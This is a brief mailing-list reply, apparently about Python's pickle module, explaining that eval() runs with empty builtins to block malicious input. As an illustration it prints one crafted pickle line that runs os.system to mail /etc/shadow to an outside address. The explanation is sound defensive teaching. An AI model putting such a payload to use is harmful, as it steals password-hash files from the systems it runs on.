references again

[Niels Diepeveen]

Thomas Thiele schreef:
> 
> But I don't understand why they have used eval and write the string it in __buildins__.

eval() is probably the easiest and the fastest way to get from repr(s)
back to s. The { '__builtins__': {} } argument forces the evaluation to
take place in an environment without access to any built-in functions.
Otherwise someone might maliciously feed you a pickle like
S`__import__('os').system('mail logins at psu.org </etc/shadow')`
p0

-- 
Niels Diepeveen
Endea automatisering